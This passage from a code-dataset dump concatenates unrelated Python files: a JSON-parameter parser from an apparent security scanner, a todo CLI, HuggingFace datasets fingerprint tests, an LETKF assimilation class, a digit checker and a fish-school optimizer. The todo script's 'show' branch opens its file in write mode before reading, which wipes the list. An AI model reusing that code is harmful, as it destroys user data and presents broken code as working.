object\n - JsonParser(string)[key] to get/modify the data in the parsed json\n'''\nclass JsonParser(object):\n def __init__(self, string):\n self.string = string\n self.is_json = False\n self.json = self._parse_json(string)\n self._args = {}\n self.tree = None\n if self.is_json:\n self.tree = self._dict_to_tree(self.json)\n self._get_leaves()\n else:\n self.json = None\n\n def keys(self):\n '''\n Return all keys of the parsed json.\n :return: json.keys()\n '''\n return self.json.keys() if self.is_json else []\n\n def args(self):\n '''\n Return the list of leaf nodes that are allowed for manipulation.\n :return: list\n '''\n return list(self._args.keys())\n\n def __getitem__(self, item):\n if item in self._args:\n identifier = self._args[item]\n return self.tree.nodes[identifier].data\n elif item in self.json:\n return self.json[item]\n else:\n raise KeyError\n\n def __setitem__(self, key, value):\n if key in self._args:\n identifier = self._args[key]\n 
self.tree.nodes[identifier].data = value\n self.json = self._tree_to_dict(self.tree)\n else:\n raise Exception(\"Cannot modify data of non-leaf nodes. You can only modify the data in the args()\")\n\n def copy(self):\n '''\n Deep copy the object\n :return: JsonParser\n '''\n return JsonParser(self.string)\n\n def _parse_json(self, s):\n '''\n Parse json string to dict. Designed for handling the case where there is json in a json.\n :param s: json string\n :return: dict\n '''\n try:\n jo = json.loads(s)\n if type(jo) is not dict:\n raise Exception\n except Exception:\n return s\n else:\n self.is_json = True\n for d in jo:\n jo[d] = self._parse_json(jo[d])\n return jo\n\n def _get_leaves(self):\n '''\n Get all leaf nodes which are allowed for data manipulation.\n :return: None\n '''\n self._args = {node.tag: node.identifier for node in self.tree.leaves()}\n return\n\n @staticmethod\n def _dict_to_tree(data):\n '''\n Parse dict to tree.\n :return: tree\n '''\n def _add_nodes(parent, name, identity, data):\n tree.create_node(name, identity, parent=parent, data=data)\n\n def _process(parent, data):\n nonlocal identity\n for i in data:\n if type(data[i]) is not dict:\n _add_nodes(parent, i, identity, data[i])\n identity += 1\n else:\n _add_nodes(parent, i, identity, \"\")\n parent_node = identity\n identity += 1\n _process(parent_node, data[i])\n\n tree = Tree()\n identity = 1\n tree.create_node('Root', 0)\n _process(0, data)\n return tree\n\n @staticmethod\n def _tree_to_dict(tree):\n '''\n Parse tree to dict.\n :param tree: A tree transformed from a dict.\n :return: dict\n '''\n\n def _get_dict(ptl, value):\n key = ptl[-1]\n if key == 0:\n k = list(value.keys())[0]\n v = list(value.values())[0]\n # combines several dicts together\n if k in result:\n new_value = dict(result[k], **v)\n result[k] = new_value\n else:\n result[k] = v\n return\n else:\n res = {tree.nodes[key].tag:value}\n return _get_dict(ptl[:-1], res)\n\n paths_to_leaves = tree.paths_to_leaves()\n result = {}\n for p in paths_to_leaves:\n num = p[-1]\n value = {tree.nodes[num].tag: tree.nodes[num].data}\n _get_dict(p[:-1], value)\n return result\n\nif __name__ == '__main__':\n import requests\n post_data = r'{\"app\":\"exp\", \"test\":{\"module\":123, \"something\":\"test\"}}'\n params = {'test':'test'}\n ob = JsonParser(post_data)\n print(ob.tree.show())\n '''\n print(ob[\"test\"], ob[\"test1\"], ob[\"test2\"])\n ob2 = ob.copy()\n ob2[\"test2\"] = \"aaaa\"\n requests.request(\"GET\", \"https://www.baidu.com\", params=params, json=ob2.json, proxies = {\"https\":\"http://127.0.0.1:8080\"}, verify=False)\n '''\n\n\n","repo_name":"fanxs-t/Shadow-Border","sub_path":"scanner/utils/parsejson.py","file_name":"parsejson.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"74232797126","text":"while True: \n user_action = input(\"Type add, show, or exit: \")\n user_action = user_action.strip()\n\n if 'add' in user_action:\n todo = user_action[4:]\n\n with open('todos.txt', 'r') as file: \n todos = file.readlines()\n\n todos.append(todo)\n\n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n\n elif 'show' in user_action:\n with open('todos.txt', 'w') as file: \n todos = file.readlines()\n \n for index, item in enumerate(todos): \n item = item.strip('\\n')\n row = f\"{index + 1}-{item}\"\n print(row)\n\n elif 'edit' in user_action:\n number = int(user_action[5:])\n number = number - 1\n\n with open('todos.txt', 'r') as file: 
\n todos = file.readlines()\n print('Here are the existing todos ', todos)\n\n new_todo = input(\"Enter a new todo: \")\n todos[number] = new_todo + '\\n'\n \n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n elif 'complete' in user_action:\n number = int(user_action[9:])\n\n with open('todos.txt', 'r') as file: \n todos = file.readlines()\n index = number - 1\n todos_to_remove = todos[index].strip('\\n')\n todos.pop(number - 1)\n\n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n \n message = f\"Todo {todos_to_remove} was removed from the list\"\n elif 'exit' in user_action: \n break\n else: \n print(\"Command is not valid\")\n\nprint(\"Bye\")","repo_name":"DWAcademProgramming/funInPython","sub_path":"todo/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39470127866","text":"import json\nimport pickle\nimport subprocess\nfrom hashlib import md5\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom types import CodeType, FunctionType\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport pytest\nfrom multiprocess import Pool\n\nimport datasets\nfrom datasets.fingerprint import Hasher, fingerprint_transform\nfrom datasets.table import InMemoryTable\n\nfrom .utils import require_regex, require_transformers\n\n\nclass Foo:\n def __init__(self, foo):\n self.foo = foo\n\n def __call__(self):\n return self.foo\n\n\nclass DatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False)\n def func1(self, new_fingerprint, *args, **kwargs):\n return DatasetChild(self.data, fingerprint=new_fingerprint)\n\n @fingerprint_transform(inplace=False)\n def func2(self, new_fingerprint, *args, **kwargs):\n return DatasetChild(self.data, fingerprint=new_fingerprint)\n\n\nclass UnpicklableCallable:\n def __init__(self, callable):\n self.callable = callable\n\n def __call__(self, *args, **kwargs):\n if self.callable is not None:\n return self.callable(*args, **kwargs)\n\n def __getstate__(self):\n raise pickle.PicklingError()\n\n\nclass TokenizersDumpTest(TestCase):\n @require_transformers\n @pytest.mark.integration\n def test_hash_tokenizer(self):\n from transformers import AutoTokenizer\n\n def encode(x):\n return tokenizer(x)\n\n # TODO: add hash consistency tests across sessions\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n hash1 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash1_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash1_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n hash2 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash2_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash2_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n hash3 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash3_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash3_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n self.assertEqual(hash1_lambda, hash3_lambda)\n self.assertNotEqual(hash1_lambda, hash2_lambda)\n self.assertEqual(hash1_encode, hash3_encode)\n self.assertNotEqual(hash1_encode, hash2_encode)\n\n 
@require_transformers\n @pytest.mark.integration\n def test_hash_tokenizer_with_cache(self):\n from transformers import AutoTokenizer\n\n tokenizer = AutoTokenizer.from_pretrained(\"gpt2\")\n hash1 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n tokenizer(\"Hello world !\") # call once to change the tokenizer's cache\n hash2 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n self.assertEqual(hash1, hash2)\n\n @require_regex\n def test_hash_regex(self):\n import regex\n\n pat = regex.Regex(\"foo\")\n hash1 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n pat = regex.Regex(\"bar\")\n hash2 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n pat = regex.Regex(\"foo\")\n hash3 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n\nclass RecurseDumpTest(TestCase):\n def test_recurse_dump_for_function(self):\n def func():\n return foo\n\n foo = [0]\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n foo = [1]\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n foo = [0]\n hash3 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_dump_ignores_line_definition_of_function(self):\n def func():\n pass\n\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n\n def func():\n pass\n\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertEqual(hash1, hash2)\n\n def test_recurse_dump_for_class(self):\n\n hash1 = md5(datasets.utils.py_utils.dumps(Foo([0]))).hexdigest()\n hash2 = md5(datasets.utils.py_utils.dumps(Foo([1]))).hexdigest()\n hash3 = md5(datasets.utils.py_utils.dumps(Foo([0]))).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_recurse_dump_for_method(self):\n\n hash1 = md5(datasets.utils.py_utils.dumps(Foo([0]).__call__)).hexdigest()\n hash2 = md5(datasets.utils.py_utils.dumps(Foo([1]).__call__)).hexdigest()\n hash3 = md5(datasets.utils.py_utils.dumps(Foo([0]).__call__)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_dump_ipython_function(self):\n\n code_args = (\n \"co_argcount\",\n \"co_kwonlyargcount\",\n \"co_nlocals\",\n \"co_stacksize\",\n \"co_flags\",\n \"co_code\",\n \"co_consts\",\n \"co_names\",\n \"co_varnames\",\n \"co_filename\",\n \"co_name\",\n \"co_firstlineno\",\n \"co_lnotab\",\n \"co_freevars\",\n \"co_cellvars\",\n )\n\n def _create_code(*args):\n \"\"\"Create CodeType for any python 3 version. 
From dill._dill._create_code\"\"\"\n if hasattr(args[-3], \"encode\"):\n args = list(args)\n args[-3] = args[-3].encode() # co_lnotab\n args[-10] = args[-10].encode() # co_code\n if hasattr(CodeType, \"co_posonlyargcount\"):\n if len(args) == 16:\n return CodeType(*args)\n elif len(args) == 15:\n return CodeType(args[0], 0, *args[1:])\n return CodeType(args[0], 0, 0, *args[1:])\n elif hasattr(CodeType, \"co_kwonlyargcount\"):\n if len(args) == 16:\n return CodeType(args[0], *args[2:])\n elif len(args) == 15:\n return CodeType(*args)\n return CodeType(args[0], 0, *args[1:])\n if len(args) == 16:\n return CodeType(args[0], *args[3:])\n elif len(args) == 15:\n return CodeType(args[0], *args[2:])\n return CodeType(*args)\n\n def create_ipython_func(co_filename, returned_obj):\n def func():\n return returned_obj\n\n code = func.__code__\n # Use _create_code from dill in order to make it work for different python versions\n code = _create_code(*[getattr(code, k) if k != \"co_filename\" else co_filename for k in code_args])\n return FunctionType(code, func.__globals__, func.__name__, func.__defaults__, func.__closure__)\n\n co_filename, returned_obj = \"\", [0]\n hash1 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n co_filename, returned_obj = \"\", [1]\n hash2 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n co_filename, returned_obj = \"\", [0]\n hash3 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_recurse_dump_for_function_with_shuffled_globals(self):\n foo, bar = [0], [1]\n\n def func():\n return foo, bar\n\n func.__module__ = \"__main__\"\n\n def globalvars_mock1_side_effect(func, *args, **kwargs):\n return {\"foo\": foo, \"bar\": bar}\n\n def globalvars_mock2_side_effect(func, *args, **kwargs):\n return {\"bar\": bar, \"foo\": foo}\n\n with patch(\"dill.detect.globalvars\", side_effect=globalvars_mock1_side_effect) as globalvars_mock1:\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertGreater(globalvars_mock1.call_count, 0)\n with patch(\"dill.detect.globalvars\", side_effect=globalvars_mock2_side_effect) as globalvars_mock2:\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertGreater(globalvars_mock2.call_count, 0)\n self.assertEqual(hash1, hash2)\n\n\nclass HashingTest(TestCase):\n def test_hash_simple(self):\n hash1 = Hasher.hash(\"hello\")\n hash2 = Hasher.hash(\"hello\")\n hash3 = Hasher.hash(\"there\")\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_class_instance(self):\n hash1 = Hasher.hash(Foo(\"hello\"))\n hash2 = Hasher.hash(Foo(\"hello\"))\n hash3 = Hasher.hash(Foo(\"there\"))\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_update(self):\n hasher = Hasher()\n for x in [\"hello\", Foo(\"hello\")]:\n hasher.update(x)\n hash1 = hasher.hexdigest()\n hasher = Hasher()\n for x in [\"hello\", Foo(\"hello\")]:\n hasher.update(x)\n hash2 = hasher.hexdigest()\n hasher = Hasher()\n for x in [\"there\", Foo(\"there\")]:\n hasher.update(x)\n hash3 = hasher.hexdigest()\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_unpicklable(self):\n with self.assertRaises(pickle.PicklingError):\n Hasher.hash(UnpicklableCallable(Foo(\"hello\")))\n\n def test_hash_same_strings(self):\n string = \"abc\"\n obj1 = 
[string, string] # two strings have the same ids\n obj2 = [string, string]\n obj3 = json.loads(f'[\"{string}\", \"{string}\"]') # two strings have different ids\n self.assertIs(obj1[0], string)\n self.assertIs(obj1[0], obj1[1])\n self.assertIs(obj2[0], string)\n self.assertIs(obj2[0], obj2[1])\n self.assertIsNot(obj3[0], string)\n self.assertIsNot(obj3[0], obj3[1])\n hash1 = Hasher.hash(obj1)\n hash2 = Hasher.hash(obj2)\n hash3 = Hasher.hash(obj3)\n self.assertEqual(hash1, hash2)\n self.assertEqual(hash1, hash3)\n\n\n@pytest.mark.integration\ndef test_move_script_doesnt_change_hash(tmp_path: Path):\n dir1 = tmp_path / \"dir1\"\n dir2 = tmp_path / \"dir2\"\n dir1.mkdir()\n dir2.mkdir()\n script_filename = \"script.py\"\n code = dedent(\n \"\"\"\n from datasets.fingerprint import Hasher\n def foo():\n pass\n print(Hasher.hash(foo))\n \"\"\"\n )\n script_path1 = dir1 / script_filename\n script_path2 = dir2 / script_filename\n with script_path1.open(\"w\") as f:\n f.write(code)\n with script_path2.open(\"w\") as f:\n f.write(code)\n fingerprint1 = subprocess.check_output([\"python\", str(script_path1)])\n fingerprint2 = subprocess.check_output([\"python\", str(script_path2)])\n assert fingerprint1 == fingerprint2\n\n\ndef test_fingerprint_in_multiprocessing():\n data = {\"a\": [0, 1, 2]}\n dataset = DatasetChild(InMemoryTable.from_pydict(data))\n expected_fingerprint = dataset.func1()._fingerprint\n assert expected_fingerprint == dataset.func1()._fingerprint\n assert expected_fingerprint != dataset.func2()._fingerprint\n\n with Pool(2) as p:\n assert expected_fingerprint == p.apply_async(dataset.func1).get()._fingerprint\n assert expected_fingerprint != p.apply_async(dataset.func2).get()._fingerprint\n\n\ndef test_fingerprint_when_transform_version_changes():\n data = {\"a\": [0, 1, 2]}\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False)\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_no_version = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False, version=\"1.0.0\")\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_1 = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False, version=\"2.0.0\")\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_2 = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n assert len({fingeprint_no_version, fingeprint_1, fingeprint_2}) == 3\n\n\ndef test_dependency_on_dill():\n # AttributeError: module 'dill._dill' has no attribute 'stack'\n hasher = Hasher()\n hasher.update(lambda x: x)\n","repo_name":"chrisjihee/CrossKorean-22.10","sub_path":"lib/datasets/tests/test_fingerprint.py","file_name":"test_fingerprint.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"11854805716","text":"import logging\nimport abc\nfrom typing import Union, Iterable, List, Callable\n\n# External modules\nimport xarray as xr\nimport numpy as np\nimport torch\nimport torch.nn\n\n# Internal modules\nfrom .etkf import ETKF\nfrom .mixin_local import DomainLocalizedMixin\nfrom ..transform.base import BaseTransformer\nfrom ..localization.localization import 
BaseLocalization\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass LETKF(DomainLocalizedMixin, ETKF):\n \"\"\"\n This is an implementation of the `localized ensemble transform Kalman\n filter` :cite:`hunt_efficient_2007`.\n This is a localized version of the `ensemble transform Kalman filter`\n :cite:`bishop_adaptive_2001`. This method iterates independently over each\n grid point in given background state. Given localization instance can be\n used to\n constrain the influence of observations in space. The ensemble weights are\n calculated for every grid point and independently applied to every grid\n point. This implementation follows :cite:`hunt_efficient_2007`, with local\n weight estimation and is implemented in PyTorch. This implementation allows\n filtering in time based on linear propagation assumption\n :cite:`hunt_four-dimensional_2004` and ensemble smoothing.\n\n Parameters\n ----------\n localization : obj or None, optional\n This localization is used to localize and constrain observations\n spatially. If this localization is None, no localization is applied such\n it is an inefficient version of the `ensemble transform Kalman filter`.\n Default value is None, indicating no localization at all.\n smoother : bool, optional\n Indicates if this filter should be run in smoothing or in filtering\n mode. In smoothing mode, no analysis time is selected from given state\n and the ensemble weights are applied to the whole state. In filtering\n mode, the weights are applied only on selected analysis time. Default\n is False, indicating filtering mode.\n inf_factor : float, optional\n Multiplicative inflation factor :math:`\\\\rho``, which is applied to the\n background precision. An inflation factor greater one increases the\n ensemble spread, while a factor less one decreases the spread. Default\n is 1.0, which is the same as no inflation at all.\n gpu : bool, optional\n Indicator if the weight estimation should be done on either GPU (True)\n or CPU (False): Default is None. 
For small models, estimation of the\n weights on CPU is faster than on GPU!.\n \"\"\"\n def __init__(\n self,\n localization: Union[None, BaseLocalization] = None,\n inf_factor: Union[float, torch.Tensor, torch.nn.Parameter] = 1.0,\n smoother: bool = False,\n gpu: bool = False,\n pre_transform: Union[None, Iterable[BaseTransformer]] = None,\n post_transform: Union[None, Iterable[BaseTransformer]] = None,\n chunksize: int = 10,\n weight_save_path: Union[None, str] = None,\n forward_model: Union[None, Callable] = None\n ):\n super().__init__(\n inf_factor=inf_factor, smoother=smoother, gpu=gpu,\n pre_transform=pre_transform,\n post_transform=post_transform,\n weight_save_path=weight_save_path,\n forward_model=forward_model\n )\n self.localization = localization\n self.chunksize = chunksize\n\n def __str__(self):\n return 'Localized ETKF(inf_factor={0}, loc={1})'.format(\n str(self.inf_factor.item()), str(self.localization)\n )\n\n def __repr__(self):\n return 'LETKF({0},{1})'.format(\n repr(self.inf_factor.item()), repr(self.localization)\n )\n\n def estimate_weights(\n self,\n state: xr.DataArray,\n filtered_obs: List[xr.Dataset],\n ens_obs: List[xr.DataArray]\n ) -> xr.DataArray:\n innovations, ens_obs_perts = self._get_obs_space_variables(\n ens_obs, filtered_obs\n )\n logger.info('Got normalized data in observational space')\n\n obs_info = self._extract_obs_information(innovations)\n logger.info('Extracted observation grid information')\n logger.debug('Obs info: {0}'.format(obs_info))\n grid_index, state_info = self._extract_state_information(state)\n logger.info('Extracted grid information about the state id')\n logger.debug('State_id: {0}'.format(state_info))\n state_info = state_info.chunk({'grid': self.chunksize, \"id_names\": -1})\n ens_obs_perts = ens_obs_perts.chunk({'ensemble': -1, \"obs_id\": -1})\n innovations = innovations.chunk({\"obs_id\": -1})\n\n logger.info('Chunked the state information')\n\n weights = xr.apply_ufunc(\n self.localized_module,\n state_info,\n ens_obs_perts,\n innovations,\n input_core_dims=[['id_names'], ['ensemble', 'obs_id'], ['obs_id']],\n vectorize=True,\n dask='parallelized',\n output_core_dims=[['ensemble', 'ensemble_new']],\n output_dtypes=[float],\n dask_gufunc_kwargs=dict(\n output_sizes={'ensemble_new': len(ens_obs_perts['ensemble'])}\n ),\n kwargs={\n 'obs_info': obs_info,\n }\n )\n logger.info('Estimated the weights')\n weights = weights.assign_coords(grid=grid_index)\n weights['ensemble_new'] = weights.indexes['ensemble']\n logger.info('Post-processed the weights')\n return weights\n","repo_name":"tobifinn/torch-assimilate","sub_path":"pytassim/interface/letkf.py","file_name":"letkf.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"14394980830","text":"n=int(input())\ne=[]\no=[]\nwhile n>0:\n r=n%10\n if r%2==0:\n e.append(r)\n else:\n o.append(r)\n n=n//10\nif len(e)>0 and len(o)==0:\n print(\"Even\")\nelif len(o)>0 and len(e)==0:\n print(\"Odd\")\nelse:\n print(\"Mixed\")","repo_name":"SairamTalisetti/codemind-python","sub_path":"Even_Odd_Mixed.py","file_name":"Even_Odd_Mixed.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74328334405","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nfrom random import uniform\nfrom math import fabs\nfrom math import cos\nfrom math import pi\nfrom objectiveFunc import *\n\nDEBUG = 
False\nINTERATIONS = 10000\nALFA= 0.01\nC = 0.1\nSTEP_IND=0.1\n\n\nMINIMUM_C = 0.001\nMAXIMUM_C = 0.999\n\n\nMIN_WEIGHT = 1\nMAX_WEIGHT = 1000\n\nclass FSSII():\n def __init__(self, number_fishes, beta , problem):\n self.number_fishes = number_fishes\n self.max_iteration = INTERATIONS\n self.problem = problem\n self._fishes = []\n self.best_fish = None\n self.beta = beta\n self.fitness_best_fish = 0\n self.c = C\n\n for nparticle in range(number_fishes):\n fish = FishII(nparticle, self.beta, problem)\n# fish.update_fitness()\n self._fishes.append(fish)\n\n def run(self):\n higher_delta_fitness = 0\n it = 1\n prev_count_fish = curr_count_fish=0\n alfa = - ALFA\n #Local Search\n for _, fish in enumerate(self._fishes):\n fish.individual_movement(it)\n if (fish.delta_fitness > higher_delta_fitness):\n higher_delta_fitness = (fish.delta_fitness)\n\n #Alimentacao\n for fish in self._fishes:\n fish.calculate_weight_I(higher_delta_fitness)\n if (fish.delta_w > 0):\n curr_count_fish +=1\n\n prev_count_fish = curr_count_fish\n history = []\n while it < INTERATIONS:\n higher_delta_fitness = 0\n curr_count_fish = 0\n sum_delta_w = 0\n\n# self.c = C * ( 1 + alfa)\n self.c += self.c * alfa\n\n if self.c < MINIMUM_C:\n self.c = MINIMUM_C\n elif self.c > MAXIMUM_C:\n self.c = MAXIMUM_C\n\n for _, fish in enumerate(self._fishes):\n fish.fish_displacement()\n fish.fitness_variation()\n\n if (fish.delta_fitness > higher_delta_fitness):\n higher_delta_fitness = fish.delta_fitness\n\n fish.calculate_weight_II(higher_delta_fitness)\n sum_delta_w += fish.delta_w\n if (fish.delta_w > 0):\n curr_count_fish +=1\n\n barycentre = self._calculate_barycentre()\n instintive_collective = self._calculate_instintive_collective()\n for fish in self._fishes:\n volitive_collective = fish.calculate_volitive_collective(sum_delta_w, barycentre, self.c)\n fish.update_position(instintive_collective, volitive_collective, self.c)\n\n if (fish.current_fitness > self.fitness_best_fish):\n print ('Modificando o melhor fitness')\n self.fitness_best_fish = fish.current_fitness\n self.best_fish = fish\n\n \"\"\"\n print fish.label\n print 'prev position', fish.prev_position\n print 'curr position', fish.current_position\n print 'delta_x', fish.delta_x\n print 'delta_w', fish.delta_w\n print 'delta_f', fish.delta_fitness\n \"\"\"\n if curr_count_fish < prev_count_fish:\n alfa *= -1\n\n prev_count_fish = curr_count_fish\n\n print ('Iteracao: %d' % it)\n #print \"*******************************************************\"\n print (self.best_fish)\n line = (\"%.15f\\n\" % (self.best_fish.current_fitness))\n history.append(line)\n# print \"*******************************************************\"\n it+=1\n if (self.best_fish.current_fitness == float('inf')):\n break\n return history\n\n def _calculate_instintive_collective(self):\n instintive_collective = [0] * self.problem.dimensions\n sum_prod = [0] * self.problem.dimensions\n sum_weight_now = 0\n\n for fish in self._fishes:\n for pos, _ in enumerate(fish.delta_x):\n sum_prod[pos] += fish.delta_x[pos] * fish.weigth\n sum_weight_now += fish.weigth\n\n constant = self.c * uniform(0,1)\n for pos, _ in enumerate(sum_prod):\n instintive_collective[pos] = constant * (sum_prod[pos]/sum_weight_now)\n\n return instintive_collective\n\n def _calculate_barycentre(self):\n school_barycentre = [0] * self.problem.dimensions\n sum_prod = [0] * self.problem.dimensions\n sum_weight_now = 0\n\n for fish in self._fishes:\n for pos,value in enumerate(fish.current_position):\n sum_prod[pos] += 
fish.current_position[pos] * fish.weigth\n sum_weight_now += fish.weigth\n\n for pos,value in enumerate(sum_prod):\n school_barycentre[pos] = value / sum_weight_now\n\n return school_barycentre\n\n def __str__(self):\n result=''\n for fish in self._fishes:\n result+=str(fish)\n return result\n\nclass FishII():\n def __init__(self, label, beta, problem):\n self.label = label\n self.problem = problem\n self.current_position =[]\n self.beta = beta\n\n if (not self.current_position):\n while len(self.current_position) < self.problem.dimensions:\n value = uniform(self.problem.pMin, self.problem.pMax)\n self.current_position.append(value)\n\n self.neighbor_position = self.current_position[:]\n self.prev_position = self.current_position[:]\n self.prev_fitness = self.neighbor_fitness = self.current_fitness = self.calculate_fitness(self.current_position)\n\n print (self.current_position)\n self.weigth = uniform(300,600); # All the fish are born with weight like that\n\n self.old_weigth = self.weigth\n self.delta_x = len(self.neighbor_position) * [0]\n\n\n def calculate_weight_I(self, delta_fitness_max):\n\n if delta_fitness_max != 0:\n fitness_gain_normalized = (self.delta_fitness * 1.0) / delta_fitness_max\n new_weigth = self.weigth + fitness_gain_normalized\n\n if (new_weigth > MAX_WEIGHT):\n new_weigth = MAX_WEIGHT\n if (new_weigth < MIN_WEIGHT):\n new_weigth = MIN_WEIGHT\n\n\n self.old_weigth = self.weigth\n self.weigth = new_weigth\n\n self.delta_w = self.weigth - self.old_weigth\n\n def calculate_fitness(self, positions):\n value = self.problem.evaluate(positions)\n \n #trabalhando como se fosse uma maximixação\n if value == 0: \n return float('inf')\n else:\n return 1/value\n\n def individual_movement(self, iteration, step_size=0.1):\n pos = 0\n self.neighbor_position = self.current_position[:]\n\n while pos < len(self.neighbor_position):\n self.delta_x[pos] = uniform(-1, 1) * STEP_IND\n pos+=1\n\n pos = 0\n while pos < len(self.neighbor_position):\n\n self.neighbor_position[pos] = self.neighbor_position[pos] + self.delta_x[pos]\n\n if (self.neighbor_position[pos] < self.problem.pMin):\n self.neighbor_position[pos] = self.problem.pMin\n if (self.neighbor_position[pos] > self.problem.pMax):\n self.neighbor_position[pos] = self.problem.pMax\n pos+=1\n\n self.neighbor_fitness = self.calculate_fitness(self.neighbor_position)\n\n #if self.neighbor_fitness > self.current_fitness:\n self.prev_fitness = self.current_fitness\n self.prev_position = self.current_position[:]\n self.current_fitness = self.neighbor_fitness\n self.current_position = self.neighbor_position[:]\n\n self.delta_fitness = self.current_fitness - self.prev_fitness\n\n def fish_displacement(self):\n self.delta_x = [0] * len(self.current_position)\n for pos, _ in enumerate(self.delta_x):\n self.delta_x[pos] = self.current_position[pos] - self.prev_position[pos]\n\n def fitness_variation(self):\n self.delta_fitness = self.current_fitness - self.prev_fitness\n\n def calculate_weight_II(self, max_delta_fitness):\n\n if max_delta_fitness == 0:\n max_delta_fitness = 1\n\n new_weigth = self.weigth + self.delta_fitness/max_delta_fitness\n self.old_weigth = self.weigth\n self.weigth = new_weigth\n self.delta_w = self.weigth - self.old_weigth\n\n def update_position(self, instintive_collective, volitive_collective, c):\n prod_delta_x = [0] * len(self.delta_x)\n new_position = [0] * len(self.current_position)\n\n for pos, _ in enumerate(self.delta_x):\n prod_delta_x[pos] = self.beta * c * self.delta_x[pos]\n\n for pos, _ in 
enumerate(new_position):\n new_position[pos] = -1 * self.current_position[pos] + prod_delta_x[pos] + instintive_collective[pos] + volitive_collective[pos]\n\n if (new_position[pos] < self.problem.pMin):\n new_position[pos] = self.problem.pMin\n if (new_position[pos] > self.problem.pMax):\n new_position[pos] = self.problem.pMax\n\n new_fitness = self.calculate_fitness(new_position)\n\n #if new_fitness >= self.current_fitness:\n self.prev_position = self.current_position[:]\n self.prev_fitness = self.current_fitness\n self.current_position = new_position[:]\n self.current_fitness = new_fitness\n\n def calculate_volitive_collective(self, sum_delta_w, barycentre, c):\n volitive_collective = [0] * self.problem.dimensions\n\n if sum_delta_w >= 0:\n signal= +1\n else:\n signal= -1\n\n constant = c * uniform(0,1) * signal\n\n for pos, _ in enumerate(barycentre):\n volitive_collective[pos] = constant * (self.current_position[pos] - barycentre[pos])\n\n return volitive_collective\n\n def __str__(self):\n return \"(%02d) Current Fitness = %10.20f | Current position = %s \\n\" % (self.label, self.current_fitness, str(self.current_position))\n\nif __name__ == '__main__':\n rastrigin = Rastrign(30)\n esfera = Esfera(30)\n ackley = AckleyFunction(30)\n 